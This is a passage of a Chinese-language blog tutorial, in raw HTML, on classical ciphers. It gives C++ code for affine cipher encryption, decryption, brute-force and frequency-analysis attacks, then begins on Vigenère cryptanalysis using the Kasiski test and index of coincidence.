class="string">'z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line"><span class="comment">//cout<<(char)('A'+m);</span></span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"******Encryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"The ciphertext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">cout</span><<s[i];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br></pre></td></tr></table></figure></div><h4 id="解密算法"><a href="#解密算法" class="headerlink" title="解密算法"></a>解密算法</h4><p> 解密变换:m=k1^(-1)*(C-k2)(mod26)</p><p> 注:为保证仿射加密函数是一个双射函数,必须要保证 (k1,26)=1。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">int</span> m[maxn];</span><br><span class="line"><span class="comment">// 将字符移位操作的位数存到数组 m [maxn] 里面 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line"><span class="comment">//cout<<(char)('A'+m);</span></span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"******Encryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"The ciphertext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">cout</span><<s[i];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br></pre></td></tr></table></figure></div><h3 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h3><h4 id="穷举攻击"><a href="#穷举攻击" class="headerlink" title="穷举攻击"></a>穷举攻击</h4><p>暴力穷举破解与解密算法相差无几,主要在于用 for 循环遍历所有的 k1 和 k2,但是应当排除 k1=1,k2=0 的无意义加密。需要注意的一点是,由于采用打表法取的 k1 值,所以 k1 的取值一定与 26 互素,就不用考虑 k1 和 26 是否互素的问题。列举出所有可能的明文(一共 311 种情况),从中找出有特定标识(如 <strong><em>flag\</em></strong> )或构成自然语言中有意义的单词或短语的正确明文。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<<span class="number">12</span>;j++)</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<=<span class="number">25</span>;k++){</span><br><span class="line"><span class="keyword">if</span>(!(c[j]==<span class="number">1</span>&&k==<span class="number">0</span>)){</span><br><span class="line"><span class="comment">// 考虑到 k1=1,k2=0 的无意义加密方式 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(inverse[c[j]]*((<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)-k+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line">m[i]=(inverse[c[j]]*((<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)-k+<span class="number">26</span>))%<span class="number">26</span>;</span><br></pre></td></tr></table></figure></div><h4 id="统计分析攻击"><a href="#统计分析攻击" class="headerlink" title="统计分析攻击"></a>统计分析攻击</h4><p>假定明文字母中出现频率最高的字母是e,其次是t(统计),设仿射加密函数为e(x)=k1x+k2(mod26);设出现频率最高的字母偏移量为a,其次是b,e(‘e’)≡a(mod26)=>e(4)≡a(mod26)=>4k1+k2≡a(mod26);e(‘t’)≡b(mod26)=>e(19)≡b(mod26)=>19k1+k2≡b(mod26)</p><p>两式相减得 15k1≡(b-a)(mod26) 而15的逆=7;两边相乘15的模逆k1≡7(b-a)(mod26)为防止k1取负数;k1≡<a href="mod26">7(b-a)(mod26)+26</a></p><p>在优化的过程中,只考虑频率出现最高的字母e,则4k1+k2≡a(mod26)=>k2≡<a href="mod26">(a-4k1)(mod26)+26</a>;</p><p>遍历表中所有的k1值,分别求出相应的k2,则可进行依次解密,解密成功率也将显著提高。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// 统计分析攻击仿射密码 </span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="comment">// 考虑使用优先级队列将数量出现最多的两个字母取出来 </span></span><br><span class="line"><span class="comment">//priority_queue<int,vector<int>,greater<int> >q;// 升序 </span></span><br><span class="line">priority_queue<<span class="keyword">int</span>,<span class="built_in">vector</span><<span class="keyword">int</span>>,less<<span class="keyword">int</span>> >q;<span class="comment">// 降序 </span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">int</span> maxn=<span class="number">1e4</span>;</span><br><span class="line"><span class="keyword">int</span> num[<span class="number">30</span>];</span><br><span class="line"><span class="keyword">char</span> str[maxn],str2[maxn];</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> c[<span class="number">15</span>]={<span class="number">1</span>,<span class="number">3</span>,<span class="number">5</span>,<span class="number">7</span>,<span class="number">9</span>,<span class="number">11</span>,<span class="number">15</span>,<span class="number">17</span>,<span class="number">19</span>,<span class="number">21</span>,<span class="number">23</span>,<span class="number">25</span>};<span class="comment">// 与 26 互素的所有元素 </span></span><br><span class="line"><span class="keyword">int</span> inverse[<span class="number">100</span>];</span><br><span class="line"><span class="keyword">int</span> temp[<span class="number">100</span>]={<span class="number">1</span>,<span class="number">9</span>,<span class="number">21</span>,<span class="number">15</span>,<span class="number">3</span>,<span class="number">19</span>,<span class="number">7</span>,<span class="number">23</span>,<span class="number">11</span>,<span class="number">5</span>,<span class="number">17</span>,<span class="number">25</span>};</span><br><span class="line"><span class="built_in">memset</span>(inverse,<span class="number">0</span>,<span class="keyword">sizeof</span>(inverse)); </span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">12</span>;i++)</span><br><span class="line">{</span><br><span class="line">inverse[c[i]]=temp[i];</span><br><span class="line">} </span><br><span class="line"><span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">while</span>(!q.empty())</span><br><span class="line">{</span><br><span class="line">q.pop();</span><br><span class="line">}<span class="comment">// 将队列清空 </span></span><br><span class="line"><span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"Please enter your ciphertext:"</span>;</span><br><span class="line"><span class="built_in">cin</span>.getline(str,maxn);<span class="comment">// 原始密文 </span></span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(str);</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line"><span class="comment">// 为方便操作,将密文转换成小写字母 </span></span><br><span class="line"><span class="keyword">if</span>(str[i]>=<span class="string">'A'</span>&&str[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">str2[i]=str[i]+<span class="string">'a'</span>-<span class="string">'A'</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> str2[i]=str[i];</span><br><span class="line"> <span class="keyword">if</span>(str2[i]>=<span class="string">'a'</span>&&str2[i]<=<span class="string">'z'</span>)</span><br><span class="line"> {</span><br><span class="line">num[<span class="keyword">int</span>(str2[i]-<span class="string">'a'</span>)]++;</span><br><span class="line">}<span class="comment">// 统计每个字母出现的次数(不考虑大小写) </span></span><br><span class="line"> }</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(num[i]!=<span class="number">0</span>)</span><br><span class="line">q.push(num[i]);</span><br><span class="line">}<span class="comment">// 把字母出现次数压到队列里进行自动排序 </span></span><br><span class="line"><span class="keyword">int</span> test1=<span class="number">0</span>; </span><br><span class="line"> <span class="keyword">int</span> test2=<span class="number">0</span>;</span><br><span class="line">test1=q.top();<span class="comment">// 出现最多的次数 </span></span><br><span class="line">q.pop(); </span><br><span class="line">test2=q.top();<span class="comment">// 出现次多的次数 </span></span><br><span class="line"><span class="comment">//q.pop();</span></span><br><span class="line"><span class="keyword">int</span> a=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> b=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(num[i]==test1)</span><br><span class="line">{</span><br><span class="line">a=i;</span><br><span class="line">}<span class="comment">// 找出出现次数最多字母偏移量 </span></span><br><span class="line"><span class="keyword">if</span>(num[i]==test2)</span><br><span class="line">{</span><br><span class="line">b=i;</span><br><span class="line">}<span class="comment">// 找出出现次数次多字母偏移量 </span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">int</span> k1=((b-a)*<span class="number">7</span>%<span class="number">26</span>+<span class="number">26</span>)%<span class="number">26</span>;<span class="comment">//+26 防止出现结果出现负数 </span></span><br><span class="line"><span class="keyword">int</span> k2=((a<span class="number">-4</span>*k1)%<span class="number">26</span>+<span class="number">26</span>)%<span class="number">26</span>; </span><br><span class="line"><span class="keyword">int</span> m[maxn];<span class="comment">// 计算每个字母偏移量放到数组 m [maxn] 中 </span></span><br><span class="line"> <span class="keyword">int</span> k3=inverse[k1];<span class="comment">// 求出 k1 模逆 </span></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line">m[i]=(k3*((<span class="keyword">int</span>)(str2[i]-<span class="string">'a'</span>)-k2+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line"><span class="comment">//cout<<(char)('A'+m);</span></span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"******Decryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"k1="</span><<k1<<<span class="string">","</span><<<span class="string">"k2="</span><<k2<<<span class="built_in">endl</span>; </span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"The plaintext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line"> {</span><br><span class="line"><span class="keyword">if</span>(str[i]>=<span class="string">'A'</span>&&str[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(str[i]>=<span class="string">'a'</span>&&str[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">cout</span><<str[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br><span class="line"> <span class="built_in">cin</span>.ignore();</span><br><span class="line">}</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h3 id="运行结果"><a href="#运行结果" class="headerlink" title="运行结果"></a>运行结果</h3><h4 id="加密"><a href="#加密" class="headerlink" title="加密"></a>加密</h4><blockquote><p>例如:明文是 Hello CUMT~ ,k1 是 5 ,k2 是 6,得到密文 Pajjy QCOX 。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/qOzk6a8Gp9h5IZi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="已知-key-解密"><a href="#已知-key-解密" class="headerlink" title="已知 key\ 解密"></a>已知 <strong><em>key\</em></strong> 解密</h4><blockquote><p>例如:密文是 Pajjy QCOX ,k1 是 5 ,k2 是 6,得到明文 Hello CUMT。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/iRODWVHwXferFUI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="暴力枚举解密"><a href="#暴力枚举解密" class="headerlink" title="暴力枚举解密"></a>暴力枚举解密</h4><blockquote><p>例如:密文是 Pajjy QCOX ,不知道 k1,k2,暴力穷举出所有可能,再结合某些标识或使明文在自然语言中有意义,得到明文 Hello CUMT 。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/LmA3OSY2zFyr8bu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="统计分析解密"><a href="#统计分析解密" class="headerlink" title="统计分析解密"></a>统计分析解密</h4><blockquote><p>例如解密:</p><p><strong><em>Pu yfo of oin hvy ufa hrpkpyb, jlar ph hopkk py oin hvy oinan, svo jn jpkk klvbi rfan zfyupgnyo zlkr; pu ovayng of ufvyg iph fjy hilgfj, lmmafmaplon nhzlmn, oin hvy jpkk sn oiafvbi oin inlao,jlar nlzi mklzn snipyg oin zfayna; pu ly fvohoanozing mlkr zlyyfo ulkk svoonaukx, oiny zknyzing jlcpyb larh, bpcny mfjna; pu P zly’o ilcn sapbio hrpkn, po jpkk ulzn of oin hvyhipyn, lyg hvyhipyn hrpkn ofbnoina, py uvkk skffr.\</em></strong></p><p>结果是:</p><p><strong><em>If not to the sun for smiling, warm is still in the sun there, but we will laugh more confident calm; if turned to found his own shadow, appropriate escape, the sun will be through the heart,warm each place behind the corner; if an outstretched palm cannot fall butterfly, then clenched waving arms, given power; if I can’t have bright smile, it will face to the sunshine, and sunshine smile together, in full bloom.\</em></strong></p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/UtEgOBxj6PVSNnd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析"><a href="#安全性分析" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>由于gcd(k1.26)=1,所以k1 有 φ(26)=12种取值;k2则有 26 种取值,刨除 k1=1,k2=0的情况,密钥空间为 12×26−1=311 。对于普通的偏移密码和乘法密码,仿射密码的安全性有很大的改善,但其实依然不够大,即使是使用穷举攻击,也能轻易破解出明文。但是更好的方式是根据统计分析规律(前提是截获的密文足够长)进行攻击。实际上,由于只有两个参数,所以找到两组明文密文对便可计算出两个参数,从而彻底攻破算法。</p><h2 id="维吉尼亚密码-Vigenere-cipher"><a href="#维吉尼亚密码-Vigenere-cipher" class="headerlink" title="维吉尼亚密码 Vigenère cipher"></a>维吉尼亚密码 <em>Vigenère cipher</em></h2><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><p>维吉尼亚密码是一种简单的多表代换密码,可以看成由一些偏移量不同的恺撒密码组成。为了掩盖字母使用中暴露的频率特征,解决的办法就是用多套符号代替原来的文字。它是一个表格,第一行代表原文的字母,下面每一横行代表原文分别由哪些字母代替,每一竖列代表我们要用第几套字符来替换原文。一共26个字母,一共26套代替法,所以这个表是一个26*26的表 .</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/x1ZTeam7OHnS3kR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="算法实现-1"><a href="#算法实现-1" class="headerlink" title="算法实现"></a>算法实现</h3><h4 id="加密算法-1"><a href="#加密算法-1" class="headerlink" title="加密算法"></a>加密算法</h4><p>s2[i]=’A’+(s2[i]+(s1[j%len1]-‘a’)-‘A’)%26;</p><p>特别要注意的是,若密钥长度小于明文长度,则密钥循环使用,这体现在我们的代码中就是对 len(1) 取模。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">int</span> j=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len2;i++)</span><br><span class="line">{</span><br><span class="line"><span class="comment">// 如果遇到空格,就不能用密钥 </span></span><br><span class="line"><span class="comment">// 通过 j 来进行标记 </span></span><br><span class="line"><span class="keyword">if</span>(s2[i]>=<span class="string">'A'</span>&&s2[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'A'</span>+(s2[i]+(s1[j%len1]-<span class="string">'a'</span>)-<span class="string">'A'</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s2[i]>=<span class="string">'a'</span>&&s2[i]<=<span class="string">'z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'a'</span>+(s2[i]+(s1[j%len1]-<span class="string">'a'</span>)-<span class="string">'a'</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<s2[i];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h4 id="解密算法-1"><a href="#解密算法-1" class="headerlink" title="解密算法"></a>解密算法</h4><p>s2[i]=’A’+(s2[i]-‘A’-(s1[j%len1]-‘a’)+26)%26;</p><p>这里加26防止出现负数。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">int</span> j=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len2;i++)</span><br><span class="line">{</span><br><span class="line"><span class="comment">// 如果遇到空格,就不能用密钥 </span></span><br><span class="line"><span class="keyword">if</span>(s2[i]>=<span class="string">'A'</span>&&s2[i]<=<span class="string">'Z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'A'</span>+(s2[i]-<span class="string">'A'</span>-(s1[j%len1]-<span class="string">'a'</span>)+<span class="number">26</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s2[i]>=<span class="string">'a'</span>&&s2[i]<=<span class="string">'z'</span>)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="string">'a'</span>+(s2[i]-<span class="string">'a'</span>-(s1[j%len1]-<span class="string">'a'</span>)+<span class="number">26</span>)%<span class="number">26</span>;</span><br><span class="line">j++;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<s2[i];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h4 id="其他考虑"><a href="#其他考虑" class="headerlink" title="其他考虑"></a>其他考虑</h4><p>对于大小写字母的区分,我们的处理方法和恺撒密码中完全相同。</p><p>对于字母之外的字符,他们不使用密钥,也不消耗密钥,这时候,密文就是明文,明文就是密文。</p><h3 id="攻击方法-1"><a href="#攻击方法-1" class="headerlink" title="攻击方法"></a>攻击方法</h3><p>破译维吉尼亚密码的关键在于它的密钥是循环重复的。如果我们知道了密钥的长度,那密文就可以被看作是交织在一起的凯撒密码,而其中每一个都可以单独破解。</p><p>多表代换密码体制的分析方法主要分为三步:第一步确定秘钥长度,常用的方法有卡西斯基(Kasiski)测试法和重合指数法(Index of Coincidence);第二步就是确定秘钥,常用的方法是拟重合指数测试法;第三步是根据第二步确定的密钥恢复出明文。</p><h4 id="Kasiski测试法"><a href="#Kasiski测试法" class="headerlink" title="Kasiski测试法"></a>Kasiski测试法</h4><p>卡西斯基试验是基于类似 the 这样的常用单词有可能被同样的密钥字母进行加密,从而在密文中重复出现。如果将密文中所有相同的字母组都找出来,并计算他们的最大公因数,就有可能提取出来密钥长度信息。</p><p>测试过程:搜索长度至少为2的相邻的一对对相同的密文段,记下它们之间的距离。而密钥长度d可能就是这些距离的最大公因子</p><h4 id="重合指数法"><a href="#重合指数法" class="headerlink" title="重合指数法"></a>重合指数法</h4><p>利用随机文本和英文文本的统计概率差别来分析密钥长度。依据:英文中每种单词出现的频率不同。</p><p>重合指数公式:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/oZVXxwTfcpnWLj4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>人们已经获得了英文的26个字母的概率分布的一个估计。期望值为:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/Ehs7cYJCdxnVkwP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>将密文按n来分组,当每组的重合指数都接近0.065时,n便为密钥的长度值</p><h3 id="完整代码"><a href="#完整代码" class="headerlink" title="完整代码"></a>完整代码</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"> <span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">float</span> IC[clen];<span class="comment">// 重合指数</span></span><br><span class="line"> <span class="built_in">memset</span>(IC,<span class="number">0</span>,<span class="keyword">sizeof</span>(IC));</span><br><span class="line"><span class="keyword">float</span> avgIC=<span class="number">0</span>;<span class="comment">// 平均重合指数</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)<span class="comment">// 统计分组字母个数 </span></span><br><span class="line">{</span><br><span class="line"> <span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));<span class="comment">// 盛放字母个数的数组</span></span><br><span class="line"> <span class="comment">// 密钥长度等于分成的组数</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;i+j*klen<clen;j++) <span class="comment">//统计每一组每个字母出现的次数 </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'A'</span>&&c[i+j*klen]<=<span class="string">'Z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'A'</span>)]++;</span><br><span class="line">} </span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'a'</span>&&c[i+j*klen]<=<span class="string">'z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'a'</span>)]++;</span><br><span class="line">}</span><br><span class="line">} </span><br><span class="line"> <span class="keyword">float</span> e=<span class="number">0</span>;<span class="comment">// 重合指数的值 重合指数是小数不能用int </span></span><br><span class="line"> <span class="keyword">int</span> L=<span class="number">0</span>; </span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// 子串密文长度 </span></span><br><span class="line"> {</span><br><span class="line"> L+=num[k]; <span class="comment">//所有的字母数量相加 </span></span><br><span class="line"> } <span class="comment">//L是密文长度 </span></span><br><span class="line"> L*=(L<span class="number">-1</span>);<span class="comment">// 分母 ,L=L*(L-1)</span></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// 分组计算重合指数 IC </span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span>(num[k]!=<span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line">e+=((<span class="keyword">float</span>)num[k]*(<span class="keyword">float</span>)(num[k]<span class="number">-1</span>))/(<span class="keyword">float</span>)L; <span class="comment">//xi(xi-1)/L(L-1) </span></span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">IC[i]=e;<span class="comment">//得到无偏估计值 </span></span><br><span class="line">} </span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)</span><br><span class="line">{</span><br><span class="line">avgIC+=IC[i];</span><br><span class="line">}</span><br><span class="line">avgIC/=klen;<span class="comment">// 求 IC 的平均值 第一次klen为1 </span></span><br><span class="line"> <span class="keyword">if</span>(avgIC>=<span class="number">0.065</span>)<span class="keyword">break</span>;<span class="comment">// 判断退出条件,重合指数的平均值是否大于 0.065 </span></span><br><span class="line"> <span class="keyword">else</span> klen++;</span><br><span class="line"><span class="comment">// cout<<"密钥长度为:"<<klen<<endl;</span></span><br><span class="line"> }</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"密钥长度为:"</span><<klen<<<span class="built_in">endl</span>;</span><br><span class="line"><span class="comment">//计算拟重合指数 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++) <span class="comment">// 统计分组字母个数 </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">int</span> g=<span class="number">0</span>;<span class="comment">// 密文移动 g 个位置 </span></span><br><span class="line"><span class="keyword">float</span> temp[<span class="number">26</span>];<span class="comment">// 存储偏移量 </span></span><br><span class="line"><span class="built_in">memset</span>(temp,<span class="number">0</span>,<span class="keyword">sizeof</span>(temp));</span><br><span class="line"><span class="keyword">for</span>(g=<span class="number">0</span>;g<<span class="number">26</span>;g++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">float</span> x=<span class="number">0</span>;<span class="comment">// 拟重合指数 </span></span><br><span class="line"><span class="built_in">memset</span>(num,<span class="number">0</span>,<span class="keyword">sizeof</span>(num));<span class="comment">// 盛放字母个数的数组</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;i+j*klen<clen;j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'A'</span>&&c[i+j*klen]<=<span class="string">'Z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'A'</span>)]++;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(c[i+j*klen]>=<span class="string">'a'</span>&&c[i+j*klen]<=<span class="string">'z'</span>)</span><br><span class="line">{ </span><br><span class="line">num[(<span class="keyword">int</span>)(c[i+j*klen]-<span class="string">'a'</span>)]++;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"> <span class="keyword">int</span> L=<span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">26</span>;k++)<span class="comment">// 子串密文长度</span></span><br><span class="line">{</span><br><span class="line">L+=num[k];</span><br><span class="line">x=x+p[k]*num[(k+g)%<span 